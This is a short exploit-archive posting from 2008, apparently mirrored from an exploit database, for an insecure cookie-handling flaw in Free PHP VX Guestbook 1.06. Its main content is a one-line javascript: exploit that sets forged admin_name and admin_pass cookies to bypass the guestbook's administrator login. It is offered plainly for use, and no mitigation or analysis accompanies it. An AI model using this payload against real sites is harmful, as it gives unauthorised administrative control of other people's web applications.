[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability
# Published : 2008-09-14
# Author : Stack
# Previous Title : Link Bid Script 1.5 Multiple Remote SQL Injection Vulnerabilities
# Next Title : Kasseler CMS 1.1.0/1.2.0 Lite Remote SQL Injection Vulnerabilities


###############################################################################################
[+] Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability 
[+] Discovered By Stack                 
[+] Greetz : All my freind                
################################################################################################
---
exploit:
javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1; path=/";

# www.Syue.com [2008-09-14]